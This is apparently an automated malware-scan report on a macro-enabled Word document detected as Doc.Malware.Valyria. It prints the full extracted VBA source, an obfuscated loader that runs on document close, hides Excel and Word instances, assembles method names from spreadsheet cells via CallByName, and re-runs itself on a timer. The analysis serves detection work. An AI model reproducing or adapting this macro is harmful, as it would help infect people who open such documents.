MALICIOUS
Risk Score: 222
Heuristics: 5

- ClamAV: Doc.Malware.Valyria-10033904-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project — VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set d9hf = CreateObject(UserForm1.ComboBox1)`
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched line in script: `x = CallByName(Application, k5eig, 2)`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9264 bytes |

SHA-256 (macros.bas): 0ebd4a7fcbae279e5e802b080b403b97adae0693c94aca7b5b17a7fe0e532666
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public eiqw, bd, ey, ww9wp, wc
Sub Document_Close()
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
hvgel = Application.Options.UseGermanSpellingReform
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
Dim d9hf
ei = Application.Options.AutoCreateNewDrawings
If hvgel > 1725 Then
c4v0w = Application.Options.MeasurementUnit
hvgel = c4v0w
End If
Set d9hf = CreateObject(UserForm1.ComboBox1)
d9hf.DisplayAlerts = False
k5eig = "visible"
d0 = "OnTime"
u4 = Application.CheckSpelling("ogt")
If ei > 3278 Then
ep = Application.Options.AutoFormatAsYouTypeReplaceOrdinals
ei = ep
End If
Dim gdrpn
k6 = 1
g14no = 1
While k6 <> 0 And g14no < 3
Set gdrpn = d9hf.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
k6 = Err.Number
g14no = g14no + 1
Wend
If k6 <> 0 Then
u5 = Application.Options.AutoFormatMatchParentheses
If ogt > 2593 Then
c9pi = Application.Options.EnableHangulHanjaRecentOrdering
ogt = c9pi
End If
x = CallByName(Application, k5eig, 2)
If x = True Then
Set p3 = CreateObject(UserForm1.ComboBox3)
p3.Documents.Open ActiveDocument.FullName, ReadOnly:=True
p3.Run "ThisDocument.nnn"
Else
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
iwu = Application.Options.HebrewMode
If u5 > 1327 Then
nx7wm = Application.Options.HebrewMode
u5 = nx7wm
End If
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
d9hf.Quit
Exit Sub
wid9h = Application.Options.ShowDiacritics
If iwu > 335 Then
f4f2f = Application.Options.CheckSpellingAsYouType
iwu = f4f2f
End If
End If
lw = Application.Options.AutoFormatAsYouTypeApplyNumberedLists
If wid9h > 344 Then
mt = Application.Options.ReplaceSelection
wid9h = mt
End If
Dim edh
Set edh = d9hf.sheets(1)
tp = "'"
wzz = d9hf.sheets(3).Cells(179, 27).Value
uq = Application.Build
If lw > 2040 Then
f8 = Application.Options.AutoFormatAsYouTypeFormatListItemBeginning
lw = f8
End If
bd = d9hf.sheets(2).Cells(49, 43).Value
eiqw = edh.Cells(230, 39).Value
m98 = d9hf.sheets(2).Cells(49, 14).Value
b36q = d9hf.sheets(3).Cells(109, 47).Value
aca4 = d9hf.sheets(3).Cells(9, 15).Value
q6 = d9hf.sheets(2).Cells(54, 5).Value
zk = d9hf.sheets(3).Cells(167, 36).Value
yg = d9hf.sheets(1).Cells(82, 4).Value
tcp = d9hf.sheets(2).Cells(208, 34).Value
mu = d9hf.sheets(1).Cells(133, 40).Value
mu6w8 = d9hf.sheets(3).Cells(148, 34).Value
d76f = d9hf.sheets(2).Cells(225, 43).Value
ar3 = d9hf.sheets(3).Cells(56, 6).Value
hv7g = d9hf.sheets(3).Cells(104, 4).Value
t9511 = d9hf.sheets(3).Cells(56, 7).Value
tr7j0 = edh.Cells(212, 41).Value
u1p = d9hf.sheets(2).Cells(192, 49).Value
t2 = edh.Cells(142, 19).Value
k10s = d9hf.sheets(3).Cells(99, 12).Value
paeo8 = edh.Cells(176, 2).Value
p2 = d9hf.sheets(2).Cells(221, 25).Value
wc = d9hf.sheets(1).Cells(119, 3).Value
ej3 = edh.Cells(70, 1).Value
eaoq = d9hf.sheets(2).Cells(36, 44).Value
sh = edh.Cells(220, 2).Value
m1 = CallByName(d9hf, wzz, 2)
Set bo = UserForm1.Controls.Add("Forms.ComboBox.1")
bo.Value = q6 & m1 & k10s
Set t9lfx = UserForm1.Controls.Add("Forms.ComboBox.1")
heog = Application.ProductCode
If uq > 2984 Then
ar3kq = Application.Options.SequenceCheck
uq = ar3kq
End If
t9lfx.Value = eaoq
CallByName CreateObject(mu), d76f, 1, bo, b36q, t9lfx
Set ejjww = CreateObject(p2)
Set k = CallByName(ejjww, hv7g, 2)
Set rnm = CallByName(k, paeo8, 1)
ijck = Application.Options.AutoKeyboardSwitching
If heog > 1704 Then
jr = Application.Options.MatchFuzzyKiKu
heog = jr
End If
Set u1p = CallByName(ejjww, u1p, 2)
Set ww9wp = ejjww
jw = Application.Options.InsertedTextColor
If ijck > 3730 Then
gmgg7 = Application.Options.InsertedTextColor
ijck = gmgg7
End If
hf = Application.Language
If jw > 59 Then
km4a = Application.Options.EnableSound
jw = km4a
End If
uln7l = Application.Options.ApplyFarEastFontsToAscii
If hf > 838 Then
zw87 = Application.Options.AddControlCharacters
hf = zw87
End If
uhj = Application.Options.AutoFormatApplyHeadings
If uln7l > 1720 Then
fxay8 = Application.Options.AutoFormatReplaceOrdinals
uln7l = fxay8
End If
Set m98 = CallByName(u1p, m98, 2)
Set yg = CallByName(m98, yg, 2)
Set a13re = CallByName(yg, sh, 1, t2)
Set eiqw = CallByName(a13re, eiqw, 2)
pgdqh = Application.Caption
If uhj > 4607 Then
udlbv = Application.Options.AutoFormatReplaceHyperlinks
uhj = udlbv
End If
r0 = Application.Options.AutoFormatApplyLists
ar3 = CallByName(eiqw, ar3, 2)
CallByName eiqw, mu6w8, 1, 1, ar3
Set ey = UserForm1.Controls.Add("Forms.ComboBox.1")
ey.Value = aca4 & tr7j0
au = Application.Options.AutoFormatAsYouTypeReplaceFarEastDashes
If r0 > 3477 Then
m0o1 = Application.Options.Creator
r0 = m0o1
End If
UserForm3.ComboBox1 = tcp
ey.Value = ej3
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = ar3
dd2ep = Application.Options.BackgroundSave
If dx3mj > 2575 Then
v6fc2 = Application.Options.InterpretHighAnsi
dx3mj = v6fc2
dx3mj = Application.Options.ApplyFarEastFontsToAscii
If au > 4989 Then
avs3 = Application.Options.DocumentViewDirection
au = avs3
End If
End If
ejjww = Nothing
gdrpn = Nothing
wd8qp = Application.Options.IgnoreMixedDigits
If dd2ep > 3892 Then
sn8yj = Application.Options.PasteSmartCutPaste
dd2ep = sn8yj
End If
w3 = Application.Options.AutoFormatMatchParentheses
If wd8qp > 2843 Then
eelz = Application.Options.PasteMergeLists
wd8qp = eelz
End If
edh = Nothing
k = Nothing
rnm = Nothing
u1p = Nothing
ieu0 = Application.Options.CheckSpellingAsYouType
If w3 > 2227 Then
ajx = Application.Build
w3 = ajx
End If
pm = Application.Options.AutoFormatReplaceFractions
If ieu0 > 3301 Then
m = Application.ProductCode
ieu0 = m
End If
m98 = Nothing
yg = Nothing
a13re = Nothing
eiqw = Nothing
ww9wp = Nothing
DoEvents
b0x2 = Application.Options.MonthNames
If pm > 4190 Then
xjxc = Application.Options.Overtype
pm = xjxc
End If
qxm7u = Application.Options.AutoFormatReplaceQuotes
If b0x2 > 928 Then
h5uk8 = Application.CheckSpelling("sy4hu")
b0x2 = sy4hu
End If
CallByName d9hf, zk, 1
d9hf = Nothing
DoEvents
CallByName CreateObject(mu), t9511, 1, q6 & m1 & k10s
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{55FC1B56-8C48-43C5-83DC-5AE637103AF2}{63B04607-AA30-464F-8169-A78FBCC9D737}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4169A098-DE23-466E-9F41-F3170B0318F3}{66C49382-2040-46FF-BB4C-553CD7065B29}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
On Error GoTo ErrorHandler
i08h5 = UserForm2.Controls.Count - 1
saqw2 = Application.Options.AllowReadingMode
r92t9 = Application.Options.ShowFormatError
If saqw2 > 1998 Then
cj8u = Application.Options.SnapToGrid
saqw2 = cj8u
End If
vxrjf = Application.Options.PromptUpdateStyle
If r92t9 > 3745 Then
v9xg = Application.Options.MatchFuzzyAY
r92t9 = v9xg
End If
y1 = Application.Options.SuggestFromMainDictionaryOnly
If vxrjf > 2013 Then
dpm = Application.Options.AutoFormatAsYouTypeAutoLetterWizard
vxrjf = dpm
End If
If Len(UserForm1.ComboBox4) > 10 Then
baf0 = Application.Options.MeasurementUnit
If y1 > 1347 Then
lie0f = Application.Options.AnimateScreenMovements
y1 = lie0f
End If
i08h5 = i08h5 * 2
End If
h8rc = ""
For vdodj = 1 To i08h5 Step 2
h8rc = h8rc & UserForm2.Controls.Item(vdodj)
Next
ComboBox1.AddItem "ek"
ComboBox1.AddItem "zo"
ComboBox1.AddItem h8rc
ComboBox1.AddItem "x9se1"
Exit Sub
ErrorHandler:
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{36D0FF89-E185-4315-9DE5-38FB10432377}{68C5F00F-B096-4158-9A5E-CC733515D6A0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
zlo1d = Application.Options.VisualSelection
CallByName ActiveDocument.eiqw, ActiveDocument.bd, VbMethod, ActiveDocument.ey
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{C1F19B49-80B2-4989-89E5-905F44275009}{6D73AE83-46A4-44F3-A4C0-A87218769CAE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.ww9wp, ActiveDocument.wc, VbMethod, ActiveDocument.ey
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 44032 bytes |

SHA-256 (vbaProject_00.bin): 2fafef0cde678b48a2840845a889ed7558c9f413a9b8ea80137dcc8e16849b09

Detection
- ClamAV: Doc.Malware.Valyria-10033904-0
- Obfuscation or payload: unlikely